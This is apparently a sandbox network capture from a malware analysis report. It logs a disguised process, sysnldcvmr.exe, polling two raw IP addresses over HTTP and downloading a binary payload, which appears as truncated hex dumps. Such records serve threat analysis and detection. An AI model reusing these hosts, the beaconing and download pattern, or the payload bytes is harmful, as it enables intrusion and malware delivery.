                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:09.837512970 CET448INData Raw: 61 fd 3b da ac 5e 3b f8 33 7c 1b c1 0c 1d 56 7e 50 3f c2 fa 81 13 af aa 2f c8 95 e8 36 df 81 5c 66 94 8a f9 ce 98 df b2 af d9 e7 86 8b 86 8a 8e 12 bc 6e 99 34 38 be 43 e1 a8 a3 35 1f b8 c8 a9 9a 71 82 42 37 b8 af 12 3a 07 5a 08 52 88 6c 72 d8 5b
                                                                                                                                                                                                                                                  Data Ascii: a;^;3|V~P?/6\fn48C5qB7:ZRlr[X3V8+N[6s>FHj,tvb'*'\=uudBy:/z ClfyvF4o+WTZjmQIAQ_[cg=8a;-t94g!]
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:09.837599993 CET1236INData Raw: 41 c1 34 56 f2 55 b0 4d af 8a 80 b7 40 d4 5e 95 8a dc 8c 32 38 f4 a5 cc ca e0 ce c7 ca af 2a 42 df ce 62 d9 09 b8 e9 5f 46 17 6b aa 12 de 7a 63 dc 80 4e 8c 51 45 99 44 37 27 8f d3 1a 49 53 4e f2 b7 35 44 4c 5b e4 79 68 89 33 88 00 a3 df b5 a7 6a
                                                                                                                                                                                                                                                  Data Ascii: A4VUM@^28*Bb_FkzcNQED7'ISN5DL[yh3j}<C*i&`^sM:fmw15=m$>M;8_$*xqY0kw4~KlL)WJ~:n`Ji%}0LZWM$hxw]
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:09.837611914 CET1236INData Raw: a8 4d 51 63 eb a7 20 7e d2 fa 29 ba 1b 73 87 fb 92 57 1a 68 37 7a b4 92 d6 a2 34 3e b3 ba 28 e9 b5 6f d3 75 a1 7f ab ce 05 8f e2 c0 b1 aa c1 af 81 e0 c7 72 c7 81 e5 2a 1a 8a 51 d2 3c ea 20 eb 93 03 b2 4d cc 0d b4 39 de 99 4b 3d 32 aa f2 42 ab 9b
                                                                                                                                                                                                                                                  Data Ascii: MQc ~)sWh7z4>(our*Q< M9K=2B[,/+?~gg).L{A]rbAx=p5KZ;ZrZ_f5dQUe4QJ$?@nw${xTuBenf4Ua]}E_TpJu$"&
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:09.837624073 CET1236INData Raw: 7c b3 3e 5f 83 de 43 2b be 5d 80 60 a6 86 4f 47 33 1c e5 b6 64 d9 1d ad 65 db 91 96 7b 74 6c 1a 6e 41 6a bf 7d 97 78 41 fc 07 d8 44 7c c8 dc df a3 6b 02 48 8e 39 47 cb 09 12 56 19 ec 5e 7a 6d 54 eb 7b ef c8 d8 b1 79 fc 3b fe 63 e7 7d 77 92 33 70
                                                                                                                                                                                                                                                  Data Ascii: |>_C+]`OG3de{tlnAj}xAD|kH9GV^zmT{y;c}w3pRy<V=5a=dUYW-XW>1-2$i00*vq=,P1~#wRpvTW$Kz{]ok>IXj@U;[h
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:09.837635994 CET1236INData Raw: 67 33 81 46 d2 a2 1e da 71 8d 02 f5 24 7b 9b 3a e7 05 54 e2 ce 99 87 94 03 3b f4 1f 3b 68 6b d9 52 1f 66 ae b8 18 bc 00 6a d6 46 37 c9 61 fd 94 ba 43 e5 3b ee 40 fb 35 38 a6 dc 48 a9 74 7d 75 c7 86 f5 b7 6f 73 e8 b1 fa 28 92 95 a5 68 91 da 2f 52
                                                                                                                                                                                                                                                  Data Ascii: g3Fq${:T;;hkRfjF7aC;@58Ht}uos(h/R#`qk1#a_Jx;JO)j <SmPC9P/ScTvD6>$ZvN?|vV%;kat{<h}aX.gcw)!Dc/&nY8}
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:09.837770939 CET1236INData Raw: 19 99 16 2c 13 e8 15 b6 89 20 89 bb ea b9 0f 0a f3 0a d1 08 32 f2 9b 53 61 55 44 51 bb 27 5a 5e 43 85 e0 98 fc c0 9e 44 eb bf 4d 8a 60 c3 69 52 fb d4 0c e1 da 53 a5 a4 95 56 4b 73 89 9c 6b 68 40 74 c8 fd 28 54 21 a1 a5 ba 13 c0 e5 2b 78 b5 0f 09
                                                                                                                                                                                                                                                  Data Ascii: , 2SaUDQ'Z^CDM`iRSVKskh@t(T!+xR<!e_{);$24S8qwj^rPKC68LzmM>.S}SN},@83607DBUIUhi3v+DQ?t5_*}NgCb;Ql*-
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:09.837784052 CET1236INData Raw: fe 7d ce 40 84 c1 d8 2d fe 58 17 46 b0 39 5b e1 b0 9c f8 40 c3 ed d5 47 75 fc e6 6b 4b e1 87 75 f7 b4 57 f6 2a f4 ef 1b f7 4e 76 10 81 94 70 fb d3 ec 1b 0f 49 69 8c 41 c2 5c 41 3e 68 46 4c 75 76 d0 eb a0 db 10 59 ea 85 3f 0c 39 f5 3f 34 67 17 fa
                                                                                                                                                                                                                                                  Data Ascii: }@-XF9[@GukKuW*NvpIiA\A>hFLuvY?9?4gcoJ{eN-Z'DI*G)X/]@Q*6yO11y4I#La!5Pqej3ZH2uDTs%1w/5Zaq:_k}H
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:09.837795973 CET544INData Raw: c5 ab 52 ae 6f 54 0f 16 79 88 5b 95 20 c3 33 b3 1b 6f 3d da da 80 4b 78 aa 4d e0 77 c2 2e 47 a2 76 05 07 70 d7 26 db f4 8b b6 ab 10 a3 b3 51 bf be 1a e2 fa 9f 95 8b 52 d4 d6 be 8a ab 2e 28 58 a0 9a bf 0f 59 49 6c 8a e1 61 c0 ca 9b 19 d4 22 09 a3
                                                                                                                                                                                                                                                  Data Ascii: RoTy[ 3o=KxMw.Gvp&QR.(XYIla"@|%]~q_io^P~A:ug3G_3NYNTv:lF.PYlN;>&g`;tfQsb7EYE@}b2&wMp5L!'
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:09.957513094 CET1236INData Raw: c2 69 40 80 88 4d 14 5f 39 28 34 05 23 5c 27 65 96 01 7f 2d 19 3b e9 76 3a 15 37 dd 67 dd d2 0e d4 60 2c ac f1 2a f5 e0 ff d7 86 7c fd 0c 06 46 2d d1 5f c5 f4 01 2e 07 45 32 18 fe 5a 1e b0 04 3a fc de c3 17 8d 3a 9d c8 50 40 df d5 83 65 27 15 9a
                                                                                                                                                                                                                                                  Data Ascii: i@M_9(4#\'e-;v:7g`,*|F-_.E2Z::P@e' YCl?w}9-K}Y}B(xOg"+~*YefZNO<Z{[YB??fHC:E-{9KjYKNO/Bb7=_!AWaIa!.


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  47192.168.2.1150068185.215.113.66807744C:\Windows\sysnldcvmr.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:12.125674963 CET166OUTGET /5 HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:13.491399050 CET728INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 16:35:13 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                  Content-Length: 564
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  48192.168.2.115007091.202.233.141807744C:\Windows\sysnldcvmr.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:16.852364063 CET166OUTGET /1 HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 91.202.233.141
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:18.167362928 CET728INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 16:35:17 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                  Content-Length: 564
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  49192.168.2.115007191.202.233.141807744C:\Windows\sysnldcvmr.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:20.454067945 CET166OUTGET /2 HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 91.202.233.141
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:21.797003984 CET728INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 16:35:21 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                  Content-Length: 564
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  50192.168.2.115007391.202.233.141807744C:\Windows\sysnldcvmr.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:24.079926014 CET166OUTGET /3 HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 91.202.233.141
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:25.411205053 CET728INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 16:35:25 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                  Content-Length: 564
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  51192.168.2.115007591.202.233.141807744C:\Windows\sysnldcvmr.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:27.731091022 CET166OUTGET /4 HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 91.202.233.141
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:29.060957909 CET728INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 16:35:28 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                  Content-Length: 564
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  52192.168.2.115007791.202.233.141807744C:\Windows\sysnldcvmr.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:31.421667099 CET166OUTGET /5 HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 91.202.233.141
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:32.739923000 CET728INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 16:35:32 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                  Content-Length: 564
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  53192.168.2.1150078185.215.113.66807744C:\Windows\sysnldcvmr.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:36.488997936 CET166OUTGET /1 HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:37.820250034 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 16:35:37 GMT
                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                  Content-Length: 9472
                                                                                                                                                                                                                                                  Last-Modified: Tue, 03 Dec 2024 13:03:44 GMT
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  ETag: "674f01b0-2500"
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Data Raw: a8 ae a9 45 71 6e c0 b6 37 92 82 98 6e c2 a5 8e 2a 25 0f 76 20 75 26 50 55 1b ea 98 8e dc 4b 3a 96 50 b2 58 9e 09 77 fc 6a 3e b2 ab 3f 68 e1 72 12 22 42 c3 f5 05 48 2b 3c f4 a3 5f 81 f1 69 40 de 88 46 74 8c a1 91 28 1e b3 2a b1 73 49 65 e4 30 ef 87 61 6c 0a 1b 2e 93 42 4d 1a 5f 8f db c0 ee 24 22 98 b5 6f 90 1b 36 1f 11 c7 a2 b9 2a e5 36 35 cf 09 16 aa fa 26 f0 e6 ac 23 26 a8 73 51 08 65 c5 6e 1a f7 9d 52 1b ba 02 48 1d c4 af c4 1a b4 1f ed be cd d6 16 b3 78 f7 81 a8 86 53 0d f6 07 4d b4 82 f1 f9 22 de 19 0a a4 97 3c b1 e5 7a c7 ec b5 bc e7 a9 6a 83 67 a1 1c 3e 3c 43 ec 39 84 b6 31 c7 5b 0b 3a 86 a9 ce 31 57 2f 03 ad cb 38 ec c0 01 c8 17 63 04 aa f1 90 8b d2 68 f6 1d 5b ba d7 10 6d a2 88 9a e8 eb 51 b1 13 00 f5 25 8e 1b 7f 62 70 b3 e9 bd bc 01 e8 18 3d be 3d 50 9b 98 a1 c2 24 ef f2 3f eb 2f cf 9f e3 e6 9b 35 85 3a 85 6a 04 c7 20 b2 30 bd e8 12 d0 cf 39 7b 0a 29 d4 84 52 4c 64 b5 a3 75 4e 80 ef 22 ae 05 61 3c 18 53 fd ad 22 1f 26 d1 00 46 9a bf a2 81 8d 9e 6f 98 71 49 b7 7d 53 7d 98 a8 4a fd bf da 86 [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: Eqn7n*%v u&PUK:PXwj>?hr"BH+<_i@Ft(*sIe0al.BM_$"o6*65&#&sQenRHxSM"<zjg><C91[:1W/8ch[mQ%bp==P$?/5:j 09{)RLduN"a<S"&FoqI}S}J&fRt:Dx_B)OUDdx7Da}Zk)%j_7?Wg.l`<#Z#bp1PTbkGx7[5.!RFmw52)ZTNy8A(`_^Z`"7w\=Bz-s'Dxe%sI,_8<1Bp)a0Q_I^fBoaF>O*0X5(e/kaa.39[rJ&3V:9_k"ft{wTsVHcNER.tKB:c4+}U2M.! hm%C>={g_{NBaA~}_Rzyjm9Os+zQ[Z`Yi@RjaAaBmA@zY!+oUHWO$1fsK:0:*,a\n>\P(Lr@xSie;b|HyW9>Sgx%2S\4`zG
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:37.820276022 CET1236INData Raw: 24 13 d6 38 8f fc 29 77 22 b4 15 19 b0 a1 cb b7 e0 4b 1c 76 57 dd 1d f0 60 d9 f7 52 69 5b 23 e7 38 30 47 63 bb ed 1b f7 15 f5 97 29 91 dd ce 82 b8 e8 94 a9 05 9b 8f 35 1e 45 c7 e8 20 ef d0 db 16 80 fe b4 ac eb 35 12 74 77 72 24 37 62 b3 27 5c 81
